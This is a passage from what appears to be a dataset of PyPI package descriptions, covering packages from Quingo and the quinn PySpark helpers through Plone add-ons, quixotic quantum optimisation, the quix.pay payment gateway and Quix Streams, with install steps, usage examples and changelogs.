output:simres:(['Q1','Q2'],[[0,0],[0,0],[1,1],[1,1],[0,0],[0,0],[0,0],[1,1],[0,0],[1,1]])For different simulation backend, please refer tosrc/examples/sim_backend, which shows the use of SymQC, QuantumSim, and Tequila backend that are currently running stably.For different simulation modes, please refer tosrc/examples/sim_exemode, which displays the output of two different simulation results currently available.APIs of the Quingo runtime systemTheQuingo_interfaceclass expose the following methods:set_log_level():can be one ofDEBUG,INFO,WARNING,ERROR, orCRITICAL.connect_backend():currently can be'pyqcas_quantumsim'or'pyqcisim_quantumsim'.get_backend_name(): return the name of the backend that is being used. An empty string will be returned if no backend has been set.get_last_qasm(): get the qasm code generated by the last execution.config_execution(, ):Configure the execution mode to'one_shot'or'state_vector'.When the execution mode is'one_shot', the number of times to run the uploaded quantum circuit can be configured using the parameternum_shotsat the same time.call_quingo(, , *args):the main entry to call Quingo operation.: the name of the Qingo file which contains the quantum function called by the host program.: the name of the quantum function: a variable length of parameters used to call the Quingo operation in the formqg_func_name().read_result(): read the computation result from the quantum kernel.For eQASM-based backend, the result is a binary block which encodes the quantum computation result.For QCIS-based backend, the result format is defined by PyQCISim. Please refer to the docstring ofquingo.if_backend.non_arch_backend.pyqcisim_quantumsim.PyQCISim_quantumsim::execute()Quingo programming tutorialAt present, Qingguo runtime system has included sample programs such asBell_state,GHZ,VQE, etc. Details can be foundhere."} +{"package": "quinine", "pacakge-description": "No description available on PyPI."} +{"package": "quinn", "pacakge-description": "QuinnPyspark helper methods to maximize developer productivity.Quinn provides DataFrame validation functions, useful column functions / DataFrame transformations, and performant helper functions.SetupQuinn isuploaded to PyPiand can be installed with this command:pip install quinnQuinn Helper FunctionsimportquinnDataFrame Validationsvalidate_presence_of_columns()quinn.validate_presence_of_columns(source_df,[\"name\",\"age\",\"fun\"])Raises an exception unlesssource_dfcontains thename,age, andfuncolumn.validate_schema()quinn.validate_schema(source_df,required_schema)Raises an exception unlesssource_dfcontains all theStructFieldsdefined in therequired_schema.validate_absence_of_columns()quinn.validate_absence_of_columns(source_df,[\"age\",\"cool\"])Raises an exception ifsource_dfcontainsageorcoolcolumns.Functionssingle_space()actual_df=source_df.withColumn(\"words_single_spaced\",quinn.single_space(col(\"words\")))Replaces all multispaces with single spaces (e.g. changes\"this has some\"to\"this has some\".remove_all_whitespace()actual_df=source_df.withColumn(\"words_without_whitespace\",quinn.remove_all_whitespace(col(\"words\")))Removes all whitespace in a string (e.g. changes\"this has some\"to\"thishassome\".anti_trim()actual_df=source_df.withColumn(\"words_anti_trimmed\",quinn.anti_trim(col(\"words\")))Removes all inner whitespace, but doesn't delete leading or trailing whitespace (e.g. changes\" this has some \"to\" thishassome \".remove_non_word_characters()actual_df=source_df.withColumn(\"words_without_nonword_chars\",quinn.remove_non_word_characters(col(\"words\")))Removes all non-word characters from a string (e.g. changes\"si%$#@!#$!@#mpsons\"to\"simpsons\".multi_equals()source_df.withColumn(\"are_s1_and_s2_cat\",quinn.multi_equals(\"cat\")(col(\"s1\"),col(\"s2\")))multi_equalsreturns true ifs1ands2are both equal to\"cat\".approx_equal()This function takes 3 arguments which are 2 Pyspark DataFrames and one integer values as threshold, and returns the Boolean column which tells if the columns are equal in the threshold.let the columns be\ncol1 = [1.2, 2.5, 3.1, 4.0, 5.5]\ncol2 = [1.3, 2.3, 3.0, 3.9, 5.6]\nthreshold = 0.2\n\nresult = approx_equal(col(\"col1\"), col(\"col2\"), threshold)\nresult.show()\n\n+-----+\n|value|\n+-----+\n| true|\n|false|\n| true|\n| true|\n| true|\n+-----+array_choice()This function takes a Column as a parameter and returns a PySpark column that contains a random value from the input column parameterdf = spark.createDataFrame([(1,), (2,), (3,), (4,), (5,)], [\"values\"])\nresult = df.select(array_choice(col(\"values\")))\n\nThe output is :=\n+--------------+\n|array_choice()|\n+--------------+\n| 2|\n+--------------+regexp_extract_all()The regexp_extract_all takes 2 parameters Stringsandregexpwhich is a regular expression. This function finds all the matches for the string which satisfies the regular expression.print(regexp_extract_all(\"this is a example text message for testing application\",r\"\\b\\w*a\\w*\\b\"))\n\nThe output is :=\n['a', 'example', 'message', 'application']Wherer\"\\b\\w*a\\w*\\b\"pattern checks for words containing letteraweek_start_date()It takes 2 parameters, column and week_start_day. It returns a Spark Dataframe column which contains the start date of the week. By default the week_start_day is set to \"Sun\".For input[\"2023-03-05\", \"2023-03-06\", \"2023-03-07\", \"2023-03-08\"]the Output isresult = df.select(\"date\", week_start_date(col(\"date\"), \"Sun\"))\nresult.show()\n+----------+----------------+\n| date|week_start_date |\n+----------+----------------+\n|2023-03-05| 2023-03-05|\n|2023-03-07| 2023-03-05|\n|2023-03-08| 2023-03-05|\n+----------+----------------+week_end_date()It also takes 2 Paramters as Column and week_end_day, and returns the dateframe column which contains the end date of the week. By default the week_end_day is set to \"sat\"+---------+-------------+\n date|week_end_date|\n+---------+-------------+\n2023-03-05| 2023-03-05|\n2023-03-07| 2023-03-12|\n2023-03-08| 2023-03-12|\n+---------+-------------+uuid5()This function generates UUIDv5 in string form from the passed column and optionally namespace and optional extra salt.\nBy default namespace is NAMESPACE_DNS UUID and no extra string used to reduce hash collisions.df = spark.createDataFrame([(\"lorem\",), (\"ipsum\",)], [\"values\"])\nresult = df.select(quinn.uuid5(F.col(\"values\")).alias(\"uuid5\"))\nresult.show(truncate=False)\n\nThe output is :=\n+------------------------------------+\n|uuid5 |\n+------------------------------------+\n|35482fda-c10a-5076-8da2-dc7bf22d6be4|\n|51b79c1d-d06c-5b30-a5c6-1fadcd3b2103|\n+------------------------------------+Transformationssnake_case_col_names()quinn.snake_case_col_names(source_df)Converts all the column names in a DataFrame to snake_case. It's annoying to write SQL queries when columns aren't snake cased.sort_columns()quinn.sort_columns(df=source_df,sort_order=\"asc\",sort_nested=True)Sorts the DataFrame columns in alphabetical order, including nested columns if sort_nested is set to True. Wide DataFrames are easier to navigate when they're sorted alphabetically.DataFrame Helperscolumn_to_list()quinn.column_to_list(source_df,\"name\")Converts a column in a DataFrame to a list of values.two_columns_to_dictionary()quinn.two_columns_to_dictionary(source_df,\"name\",\"age\")Converts two columns of a DataFrame into a dictionary. In this example,nameis the key andageis the value.to_list_of_dictionaries()quinn.to_list_of_dictionaries(source_df)Converts an entire DataFrame into a list of dictionaries.show_output_to_df()quinn.show_output_to_df(output_str,spark)Parses a spark DataFrame output string into a spark DataFrame. Useful for quickly pulling data from a log into a DataFrame. In this example, output_str is a string of the form:+----+---+-----------+------+\n|name|age| stuff1|stuff2|\n+----+---+-----------+------+\n|jose| 1|nice person| yoyo|\n| li| 2|nice person| yoyo|\n| liz| 3|nice person| yoyo|\n+----+---+-----------+------+Schema Helpersschema_from_csv()quinn.schema_from_csv(\"schema.csv\")Converts a CSV file into a PySpark schema (akaStructType). The CSV must contain the column name and type. The nullable and metadata columns are optional.Here's an example CSV file:name,type\nperson,string\naddress,string\nphoneNumber,string\nage,intHere's how to convert that CSV file to a PySpark schema:schema=schema_from_csv(spark,\"some_file.csv\")StructType([StructField(\"person\",StringType(),True),StructField(\"address\",StringType(),True),StructField(\"phoneNumber\",StringType(),True),StructField(\"age\",IntegerType(),True),])Here's a more complex CSV file:name,type,nullable,metadata\nperson,string,false,{\"description\":\"The person's name\"}\naddress,string\nphoneNumber,string,TRUE,{\"description\":\"The person's phone number\"}\nage,int,FalseHere's how to read this CSV file into a PySpark schema:another_schema=schema_from_csv(spark,\"some_file.csv\")StructType([StructField(\"person\",StringType(),False,{\"description\":\"The person's name\"}),StructField(\"address\",StringType(),True),StructField(\"phoneNumber\",StringType(),True,{\"description\":\"The person's phone number\"}),StructField(\"age\",IntegerType(),False),])print_schema_as_code()fields=[StructField(\"simple_int\",IntegerType()),StructField(\"decimal_with_nums\",DecimalType(19,8)),StructField(\"array\",ArrayType(FloatType()))]schema=StructType(fields)printable_schema:str=quinn.print_schema_as_code(schema)Converts a SparkDataTypeto a string of Python code that can be evaluated as code using eval(). If theDataTypeis aStructType, this can be used to print an existing schema in a format that can be copy-pasted into a Python script, log to a file, etc.For example:print(printable_schema)StructType(\n\tfields=[\n\t\tStructField(\"simple_int\", IntegerType(), True),\n\t\tStructField(\"decimal_with_nums\", DecimalType(19, 8), True),\n\t\tStructField(\n\t\t\t\"array\",\n\t\t\tArrayType(FloatType()),\n\t\t\tTrue,\n\t\t),\n\t]\n)Once evaluated, the printable schema is a valid schema that can be used in dataframe creation, validation, etc.fromchispa.schema_comparerimportassert_basic_schema_equalityparsed_schema=eval(printable_schema)assert_basic_schema_equality(parsed_schema,schema)# passesprint_schema_as_code()can also be used to print otherDataTypeobjects.ArrayTypearray_type=ArrayType(FloatType())printable_type:str=quinn.print_schema_as_code(array_type)print(printable_type)ArrayType(FloatType())MapTypemap_type=MapType(StringType(),FloatType())printable_type:str=quinn.print_schema_as_code(map_type)print(printable_type)MapType(\n StringType(),\n FloatType(),\n True,\n)IntegerType,StringTypeetc.integer_type=IntegerType()printable_type:str=quinn.print_schema_as_code(integer_type)print(printable_type)IntegerType()Pyspark Core Class Extensionsfrom quinn.extensions import *Column ExtensionsisFalsy()source_df.withColumn(\"is_stuff_falsy\",F.col(\"has_stuff\").isFalsy())ReturnsTrueifhas_stuffisNoneorFalse.isTruthy()source_df.withColumn(\"is_stuff_truthy\",F.col(\"has_stuff\").isTruthy())ReturnsTrueunlesshas_stuffisNoneorFalse.isNullOrBlank()source_df.withColumn(\"is_blah_null_or_blank\",F.col(\"blah\").isNullOrBlank())ReturnsTrueifblahisnullor blank (the empty string or a string that only contains whitespace).isNotIn()source_df.withColumn(\"is_not_bobs_hobby\",F.col(\"fun_thing\").isNotIn(bobs_hobbies))ReturnsTrueiffun_thingis not included in thebobs_hobbieslist.nullBetween()source_df.withColumn(\"is_between\",F.col(\"age\").nullBetween(F.col(\"lower_age\"),F.col(\"upper_age\")))ReturnsTrueifageis betweenlower_ageandupper_age. Iflower_ageis populated andupper_ageisnull, it will returnTrueifageis greater than or equal tolower_age. Iflower_ageisnullandupper_ageis populate, it will returnTrueifageis lower than or equal toupper_age.ContributingWe are actively looking for feature requests, pull requests, and bug fixes.Any developer that demonstrates excellence will be invited to be a maintainer of the project.Code StyleWe are usingPySpark code-styleandsphinxas docstrings format. For more details aboutsphinxformat seethis tutorial. A short example ofsphinx-formated docstring is placed below:\"\"\"[Summary]:param [ParamName]: [ParamDescription], defaults to [DefaultParamVal]:type [ParamName]: [ParamType](, optional)...:raises [ErrorType]: [ErrorDescription]...:return: [ReturnDescription]:rtype: [ReturnType]\"\"\""} +{"package": "quinnat", "pacakge-description": "QuinnatQuinnat is a library for building urbit chatbots, built withUrlock.Here's how to use it:#!/usr/bin/python\n\nimport quinnat\n\nq = quinnat.Quinnat(\n \"http://localhost:8080\", # or wherever your ship is running\n \"sampel-palnet\",\n \"your-+code-here\",\n)\n\nq.connect()\n\nq.post_message(\"palnet-sampel\", \"my-chat-1234\", {\"text\": \"Hello world!\"})\n\ndef say_hello(message, replier):\n if \"hello bot\" in message.full_text:\n replier({\"text\": \"Hello \" + message.author})\n\nq.listen(say_hello)"} +{"package": "quinoa", "pacakge-description": "This is a simple package for making MUC/groupchat-aware Jabber bots. It provides a class, quinoa.Bot, which you can subclass to make your own bots. See the readme for more information."} +{"package": "quint", "pacakge-description": "No hassle Q-learning libraryQuint is a minimal path finding library useful for discrete state scenariosUsageInstall :pip install quintImport :from quint import quintInstantiate :model = quint(reward_matrix, gamma)(refer quint docstring for matrix structure)Override quint.act() to your own action functionLearn :model.learn(final_state, iterations)Trace :model.find_optimum_path(from_state)MIT LicenseCopyright (C) 2014 Abhinav Tushar"} +{"package": "quintagroup.analytics", "pacakge-description": "Quintagroup Analytics Tool for Plonequintagroup.analytics provides statistic information about your Plone site. It\nadds few content stats views of plone content workflow states, ownership and\nportlets registered on different contexts.Information provided by Quintagroup Analytics Tool allows you to see Plone site\ncontent from different perspectives. This information can be very useful while\nmigrating your site into newer Plone version, or into another CMS.With its help you can visually audit the content setup in Plone site before migration\nand compare it with the migrated website structure.UsageTo see your Plone site statistic information - navigate to \u2018Quintagroup Analytics\u2019 item\nunder Add-on Products Configuarion. Browse through all configlet tabs to see all statistic\ninformation, generated by Quintagroup Analytics Tool:Content Ownership by Type - information about most popular content types on your site. Here you\ncan see the most frequently created content types on your site and their owners.Content Ownership by State - information about site\u2019s content workflow states. Here you can see\nhow many content object are published/submitted for review/etc. and their owners.Content Types by State - information about site\u2019s most frequently created content types and their\nworkflow states.Site Portlets - information about site portlets assigned throughout site sections. This information\ncan be exported into .csv format. You can see all portlets assigned on your site and edit them.Legacy Portlets - information about legacy assigned throughout site sections. This information\ncan be exported into .csv format.Properties stats - information on certain property values for all site objects, such as\ntitles, descriptions, etc. This information can be exported into .csv format.CompatibilityPlone 3.x, Plone 4.xLinksProduct Homepage:http://quintagroup.com/services/plone-development/products/quintagroup.analyticsDocumentation Area:http://projects.quintagroup.com/products/wiki/quintagroup.analyticsRepository:http://svn.quintagroup.com/products/quintagroup.analyticsAuthors and contributorsMyroslav OpyrVolodymyr CherepanyakTaras MelnychukBohdan Koval\u2019Roman KozlovskyiVitaliy PodobaJulien SteglePython web development by Quintagroup, 2003-2012Changelog1.1.1 - 2012-05-31fixed syntax for python 2.4fixed tests for plone 4.2 and pyflakesfixed pep81.1 - 2012-04-11refactored configlet tabsfrench translation addedtranslations added1.0 - 2010-11-19Initial release"} +{"package": "quintagroup.canonicalpath", "pacakge-description": "Introductionquintagroup.canonicalpath package brings canonical path calculation\nfunctionality to Plone. The package allows to define path and/or link\nto the object, which may differ from standard physical path or its URL\nin portal.It\u2019s used by such products as quintagroup.seoptimizer (for defining\ncanonical link of the object) and quintagroup.plonegooglesitemaps (on\ngoogle sitemaps generation).This package is intended for bringingcanonical_pathand/orcanonical_linkproperty to any traversable object. For that purpose\nit defines ICanonicalPath and ICanonicalLink interfaces, and registers\nbasic adapters for ITraversable objects.This package also registerscanonical_pathandcanonical_linkindexes\nfor possible usage in catalog (ZCatalog).Default adapters behaviour:canonical_pathreturns path from portal root, i.e. for/plone/front-pagecanonical_path will be/front-page.canonical_linkreturns absoulute url of the object.Supported Plone version3.xAuthorsThe product was developed by Quintagroup.com team:Andriy MylenkyiTaras MelnychukVolodymyr CherepanyakPython development by Quintagroup, 2003-2012Changelog0.7 (2010-06-01)Add converters from CanonicalPath to CanonicalLink.\nUseful for migration\n[mylan]Added tests for convertors\n[mylan]Extract DefaultPropertyAdapter into separate one\nfrom DefaultCanonicalAdapter\n[mylan]Added tests of default adapters registration\n[mylan]0.6 (2010-04-19)added compatibility with plone 3.0-3.3 [fenix]added compatibility for plone 4, removed unnecessary tests [fenix]added delete property functionality for ICanonicalPath,\nICanonicalLink [mylan]added ICanonicalLink interface/adapter/tests/indexer [mylan]0.4 (2010-02-11)Reregistered base adatapter for OFS.interface.ITraversable [mylan]Rewrite indexer registration with help of plone.indexer [mylan]Removed metadata registration in portal catalog [mylan]Added tests [mylan]Added README [mylan]0.1 (2009-03-13)Initial release"} +{"package": "quintagroup.captcha.core", "pacakge-description": "IntroductionQuintagroup Captcha Core (quintagroup.captcha.core) is a core package of simple\ncaptcha implementation. It allows to configure captchas on your Plone site.This product works together with other Quintagroup captcha products.\nTo protect standard Plone forms with captcha - use quintagroup.plonecaptchas package.https://pypi.python.org/pypi/quintagroup.plonecaptchasquintagroup.captcha.core UsageAfter product installation you\u2019ll see \u2018Plone captchas setup\u2019 option under\n\u2018Add-on Product Configuration\u2019 in Site Setup. There you can select what kind\nof captchas you want to appear: either static or dynamic. In case you select\ndynamic - captcha images will be generated on the fly and you will be able to\nconfigure captchas look by using different font sizes, background and font\ncolours, period, amplitude, random values.CompatibilityPlone 3.xPlone 4.xLinksDocumentation -http://projects.quintagroup.com/products/wiki/quintagroup.captcha.coreSVN Repository -http://svn.quintagroup.com/products/quintagroup.captcha.coreNotesIf you want captcha for Plone default forms - use quintagroup.plonecaptchas producthttp://projects.quintagroup.com/products/wiki/quintagroup.plonecaptchasIf you want captcha support for PloneFormGen forms - use quintagroup.pfg.captcha producthttp://projects.quintagroup.com/products/wiki/quintagroup.pfg.captchaAuthorsThe product is developed and maintained byhttp://quintagroup.comteam.Andriy MylenkyyVolodymyr CherepanyakCopyright (c) \u201cQuintagroup\u201d:http://quintagroup.com, 2004-2010Changelog0.4.3 - (2013-07-04)Added the backward compatibility with Python 2.4 [potar]0.4.2 - (2013-06-26)Added transifex config [kroman0]Updated French translations from transifex, many thanks to Marc Sokolovitch\n[kroman0]Added inline validation detector [vmaksymiv]0.4.1 - (2013-02-11)Fixed ValueError on validation for dynamic captcha [kroman0]Fixed AttributeError on validation [kroman0]0.4 - (2013-01-17)Updated pt_BR translation [cleber_jsantos]Updated classifiers [vmaksymiv]Cleanup code [vmaksymiv]Fixed ValueError on validation [kroman0]0.3 - (2011-07-22)Plone 4.1 comopatibility release [chervol]0.2.4 - (2010-09-08)removed tabindex from configlet [chervol]0.2.3 -(2010-09-08)fixed import errors [chervol]0.2.2 - (2010-07-19)Added German translation\n[Fabian Reinhard]0.2.1 (2010-06-17)Fixed captcha_widget issue\n(http://plone.org/products/plone-comments/issues/5)\n[mylan]0.2 - June 9, 2010Added Plone-4 support [mylan, kroman0]Added italian translation [kroman0]Updated translations [olha, mylan]Added, updated tests [mylan]0.1 - Apr 7, 2010Initial release"} +{"package": "quintagroup.catalogupdater", "pacakge-description": "quintagroup.catalogupdater package is intended for extending ZCatalog API\nwith possiblity to update selected columns only. This package registers\n\u2018catalog_updater\u2019 utility for that.To simplify usage of the utility, quintagroup.catalogupdater extends GenericSetup\u2019s\nZCatalog XMLAdapter handler, which allows toupdateattribute usage incolumntag ofcatalog.xmlfile.So, when you add a new column to the catalog, you add catalog.xml file\nin some profile with following part:...\n\n...This addsnew_columnmetadata to the portal_catalog, BUT, this\nmetadata will be empty untill you rebuild the catalog. To automate\nthis step you can add \u2018update=\u201dTrue\u201d\u2019 attribute to the tag. And this\nwill lead to column update after adding. Thus, result usage should look\nlike this:...\n\n...It also supports subtransactions, based on threshold property of ZCatalog.InstallationSee docs/INSTALL.txt file within product package for instructions.RequirementsPlone 3.xPlone 4.0AuthorAndriy MylenkyiPython development by Quintagroup, 2004-2012Changelog0.1.1 - Mar 24, 2010added compatibility for Plone 40.1 - Mar 11, 2010Initial release:Registered \u2018catalog_updater\u2019 utility for list\nof columns updating [mylan]Extended ZCatalogXMLAdapter forupdateproperty\nsupport incolumntag [mylan]Tests added [mylan]Documentation files prepared for initial public release [olha]"} +{"package": "quintagroup.doublecolumndocument", "pacakge-description": "IntroductionThis package provides document-like plone content type which has two content\ncolumns.Supported Plone versions3.xAuthorsMyroslav OpyrAndriy MylenkyyVitaliy PodobaYuriy HvozdovychPlone Development by Quintagroup, 2004-2012Changelog0.2 - March 25, 2009reStructed ;-) documentation.\n[piv]Made it compatible with plone 3.\n[piv]Made it in a zope 3/plone 3 way.\n[piv]Made it as a python egg.\n[piv]Updated translations.\n[piv]Fixed a few css issues.\n[gvizdyk]0.1.5Added \u201cvisualClear\u201d div in view template.0.1.4DoubleColumnDocument moved to ATCT.Tested on Plone 2.50.1.3Miscellaneous cleanups in HISTORY.txt,\ndoublecolumndocument_view.pt, DoubleColumnDocument.py.0.1.2Review translation widget\u2019s properties of\ndescription field of DoubleColumnDocument class.Add i18n translation to product with\nSpanish, Argentine-Spanish languages.0.1.1Renamed Dou\u201dd\u201dleColumnDocument to Dou\u201db\u201dleColumnDocument .In DoubleColumnDocument class, in schema\nattribute BaseFolderSchema to BaseSchema.In\nDoubleColumnDocument/skins/doublecolumndocument/doublecolumndocument_view.pt\nreviewed for correct rendering of different mimetype content in view mode.Updated propertied of Body1 & Body2 fields.Add i18n translation to product with Ukrainian languages.0.1basic functionality"} +{"package": "quintagroup.dropdownmenu", "pacakge-description": "The product allows you to build a responsive multilevel drop-down menu that will\nprovide your visitors with organized and intuitive navigation. On mobile devices\nyour top menu bar transforms into one drop-down. By clicking on the title or\na small arrow next to it all-level menu items appear below the title.This package allows to build dropdown menu through the web with portal_actions.\nSubmenus are built from a tree of nested Category Actions and Actions.The other strategy used to populate submenus is Plone default NavigationStrategy,\nthe one used in navigation portlet.This project is successor of qPloneDropDownMenu.Building you dropdown menu with portal_actionsStarting from Plone 3 portal actions introduced CMF Action Category\ncontainers, it opened opportunity to build nested actions trees. Though CMF Action\nCategory does not behave as a regular action, it has different set of properties.\nWe introduced convention in quintagroup.dropdownmenu that requires to have\na specially named Action for each Actions Category. The id of each such action\nmust be build using the rule:action_id = prefix + category_id + suffixwhere:category_id:is id of correspondent CMF Action Categoryprefix:defined in DropDownMenu configlet, default value \u2018\u2019suffix:defined in DropDownMenu configlet, default value \u2018_sub\u2019So, the actions structure can look like:+ portal_tabs\n|- home\n|- blog_sub\n|-+ blog\n| |-- 2009\n| |-- 2010By default the root of dropdown menu is \u2018portal_tabs\u2019 category.Menu cachingIf the menu built with Navigation strategy is entirely public it can be cached for\nall users. If Authenticaded users should see some non public items the menu can be\ncached for anonymous only.Caching in case of involving the portal_actions strategy is effective only in case\nif all the action are public and have no extra conditions. In case some conditions\nare applied per action switch off caching.CompatibilityPlone 4.xsample CSS file based on Sunburst theme providedPlone 3.xthe default CSS file has to be overriddenInstallationaddhttp://good-py.appspot.com/release/plone.app.registry/1.0b2to versions in your buildout for Plone<4.1add quintagroup.dropdownmenu to eggs in your buildoutinstall Plone DropDown Menu in Plone via Site Setup -> Add-onsFind more details on the topic inside docs/INSTALL.txtContributorsVolodymyr Cherepanyak [chervol]Vitaliy Podoba [piv]Yuriy Gvozdovych [gvizdyk]Olha Pelishok [olha]Taras Melnychuk [fenix]Roman Kozlovskyi [kroman0]Malthe BorchChangelog1.3.4 - June 09, 2015Fixed mobile dropdown menu [kroman0]1.3.3 - June 09, 2015Cleanup templates [kroman0]Added upgrade step for version 1.3 [kroman0]1.3.2 - June 05, 2015Fixed styled for mobile dropdown [roman.ischiv]1.3.1 - May 25,2015Fixed bug with image directory [roman.ischiv]1.3 - May 22,2015Added js script for mobile dropdown menu [roman.ischiv]1.2.14 - November 18, 2013Deleted unnecessary portal top styles.1.2.13 - July 30, 2013Updated condition for \u2018mobileMenu\u2019 [kroman0]Fixed \u2018item_remote_url\u2019 [kroman0]Updated css media for package [gvizdyk]Hidden mobile menu for print [gvizdyk]Updated styles for mobile navigations [gvizdyk]Updated condition for include styles for mobile device [gvizdyk]Use getRemoteUrl for links [kroman0]The cache key of portal tabs was updated (thanks: richardc).\n[potar]Fixed getting navigation root [kroman0]1.2.12 - April 02, 2013Fixed \u2018no record\u2019 error [kroman0]Added sections heading [kroman0]Fixed empty class attributes [kroman0]Fixed html validation of mobile layout [kroman0]Cleanup templates [kroman0]Wraped mobile menu in div [kroman0]Added ids for navigation [kroman0]1.2.11 - August 10,2012\n \n{% endblock %}contact/success.html:{% extends \"base.html\" %}\n{% block content %}\n

Your message has been sent.

\n{% endblock %}contact/email.txt:From: {{ name }} {{ email }}\n\n{{ message }}\n\n---\nThis message was sent via the website contact form.SettingsThe following settings can be set insettings.pyfor the contact form. OnlyCONTACT_EMAILSis required, which is a tuple or list of email addresses to\nwhich the contact form should be sent.SettingDefaultRequiredCONTACT_EMAILSYesCONTACT_FORM_CLASS\"quix.django.contact.forms.ContactForm\"NoCONTACT_FORM_TEMPLATE\"contact/form.html\"NoCONTACT_SUCCESS_TEMPLATE\"contact/success.html\"NoCONTACT_EMAIL_TEMPLATE\"contact/email.txt\"No"} +{"package": "quixotic", "pacakge-description": "Welcome to QuixoticWhat is Quixotic?Quixotic is a Python library for simple-to-use, low-code quantum computing.FeaturesEasy-to-apply quantum algorithms for a number of combinatorial optimization problems usingQuantum AnnealingandQAOA.Includes out-of-the-box support for various optimization problems like maximum clique and minimum vertex cover.Supports custom problem formulations asQUBOs.Simple-to-use execution of algorithms using both local simulation on your laptop and managed quantum computers onAmazon Braketor the D-Wave LEAP service.Quantum is Optional: serves as a general-purpose optimization library allowing you to solve problems on your laptop using simulated annealing and exact solversInstallpip install -U pippip install quixoticNOTE: Python version>= 3.7is required.Usage Example: Find Maximum Clique in a Graph# construct or load your input graphimportnetworkxasnxseed=1967g=nx.erdos_renyi_graph(6,p=0.5,seed=seed)positions=nx.spring_layout(g,seed=seed)nx.draw(g,with_labels=True,pos=positions)# approximate a solution using QuantumAnnealer and extract resultsfromquixotic.coreimportQuantumAnnealerqo=QuantumAnnealer(g,task='maximum_clique').execute()nodes=qo.results()Executing locally.# plot nodes comprising the solutionsub=g.subgraph(nodes)nx.draw(g,pos=positions,with_labels=True)nx.draw(sub,pos=positions,node_color=\"r\",edge_color=\"r\")How to Execute on a Quantum Computer:By default,Quixoticuses a local solver or simulator (e.g., quantum simulator, simulated annealing), which allows you to easily run and test on your CPU-based laptop. To run on an actual managed quantum computer hosted on Amazon Braket, simply set the backend toawsand supply thedevice_arnands3_folderparameters. Here is an example of using theQuantumAnnealeron a quantum computer managed by Amazon Braket:fromquixotic.coreimportQuantumAnnealerqo=QuantumAnnealer(g,task='maximum_clique',backend='aws',# Amazon AWS as backenddevice_arn='arn:aws:braket:::device/qpu/d-wave/DW_2000Q_6',# D-Wave QPUs3_folder=(\"amazon-braket-Your-Bucket-Name\",\"Your-Folder-Name\"))qo.execute()# executes algorithm on quantum hardware managed by Amazon Braketsolution_nodes=qo.results()For theQuantumAnnealer, you can alternatively use D-Wave LEAP as a backend by specifyingbackend='dwave'. However, to use a managed quantum computer, you'll need to first create an account with one of the backend providers using the instructions below:Setting up an Amazon Braket AccountCreate an AWS account and activateAmazon Braket.During the onboarding process in the previous step, you will generate an Amazon Braket bucket of the formamazon-braket-XXXXXX. Make note of this.If runningQuixoticon your laptop and using a remote quantum device, you'll have toconfigure and store your AWS credentials locally. If using a managed notebook within Amazon Braket itself, you can skip this step.Setbackend='aws'in addition to thedevice_arnands3_folderparameters when executing either theQuantumAnnealeror theQAOAalgorithm, as shown above.Setting up a D-Wave LEAP AccountTheQuantumAnnealercan also use D-Wave LEAP as a backend instead of Amazon Braket, if following the steps below. (LEAP is D-Wave's cloud-based quantum service.)Create a LEAP account and make note of the API Token assigned to you.AfterQuixoticis installed, run the command:dwave config create. Copy and paste your API token when prompted and select defaults for everything else.When usingQuantumAnnealerinQuixotic, setbackend='dwave'and run the code below to use the default solver:# Executing on D-Wave quantum backendfromquixotic.coreimportQuantumAnnealersolution_nodes=QuantumAnnealer(g,task='maximum_clique',backend='dwave').execute().results()"} +{"package": "quix.pay", "pacakge-description": "Copyright (c) 2010, 2011 Quixotix Software, LLC\nAll Rights Reserved.Quixotix Payment is a set of classes for abstract interfacing with online\npayment gateways used to process credit card transactions.Supported GatewaysAuthorize.NET AIM -http://www.authorize.netPSiGate XML Messenger -http://www.psigate.comQuantam Gateway Authorize.Net Emulation -http://www.quantamgateway.comInstallationeasy_install quix.payExample UsageSimple authorize request using Authorize.NET in test mode:from quix.pay.transaction import CreditCard\nfrom quix.pay.gateway.authorizenet import AimGateway\n\ncard = CreditCard(\n number = '4111111111111111',\n month = '10',\n year = '2020',\n first_name = 'John',\n last_name = 'Doe',\n code = '123'\n)\n\ngateway = AimGateway('YOUR API LOGIN', 'YOUR API PASSWORD')\ngateway.use_test_mode = True\ngateway.use_test_url = True\nresponse = gateway.authorize(1, card)\n\nprint \"Authorize Request: %s\" % gateway.get_last_request().url\nprint \"Transaction %s = %s: %s\" % (response.trans_id,\n response.status_strings[response.status],\n response.message)The author has posted an article on using quix.pay with the Authroize.Net AIM\ngateway on his blog:http://www.micahcarrick.com/python-authorize-net-payment-gateway.html"} +{"package": "quixstreams", "pacakge-description": "Quix Streams v2Quix Streams v2 is a cloud native library for processing data in Kafka using pure Python. It\u2019s designed to give you the power of a distributed system in a lightweight library by combining the low-level scalability and resiliency features of Kafka with an easy to use Python interface.Quix Streams has the following benefits:No JVM, no orchestrator, no server-side engine.Easily integrates with the entire Python ecosystem (pandas, scikit-learn, TensorFlow, PyTorch etc).Support for many serialization formats, including JSON (and Quix-specific).Support for stateful operations using RocksDB.Support for aggregations over tumbling and hopping time windowsA simple framework with Pandas-like interface to ease newcomers to streaming.\"At-least-once\" Kafka processing guarantees.Designed to run and scale resiliently via container orchestration (like Kubernetes).Easily runs locally and in Jupyter Notebook for convenient development and debugging.Seamless integration with the Quix platform.Use Quix Streams to build event-driven, machine learning/AI or physics-based applications that depend on real-time data from Kafka.Getting started \ud83c\udfc4Install Quix Streamspython-mpipinstallquixstreamsRequirementsPython 3.8+, Apache Kafka 0.10+Seerequirements.txtfor the full list of requirementsExample ApplicationHere's an example of how toprocessdata from a Kafka Topic with Quix Streams:fromquixstreamsimportApplication,State# Define an applicationapp=Application(broker_address=\"localhost:9092\",# Kafka broker addressconsumer_group=\"consumer-group-name\",# Kafka consumer group)# Define the input and output topics. By default, \"json\" serialization will be usedinput_topic=app.topic(\"my_input_topic\")output_topic=app.topic(\"my_output_topic\")defcount(data:dict,state:State):# Get a value from state for the current Kafka message keytotal=state.get('total',default=0)total+=1# Set a value back to the statestate.set('total',total)# Update your message data with a value from the statedata['total']=total# Create a StreamingDataFrame instance# StreamingDataFrame is a primary interface to define the message processing pipelinesdf=app.dataframe(topic=input_topic)# Print the incoming messagessdf=sdf.update(lambdavalue:print('Received a message:',value))# Select fields from incoming messagessdf=sdf[[\"field_1\",\"field_2\",\"field_3\"]]# Filter only messages with \"field_0\" > 10 and \"field_2\" != \"test\"sdf=sdf[(sdf[\"field_1\"]>10)&(sdf[\"field_2\"]!=\"test\")]# Filter messages using custom functionssdf=sdf[sdf.apply(lambdavalue:0<(value['field_1']+value['field_3'])<1000)]# Generate a new value based on the current onesdf=sdf.apply(lambdavalue:{**value,'new_field':'new_value'})# Update a value based on the entire message 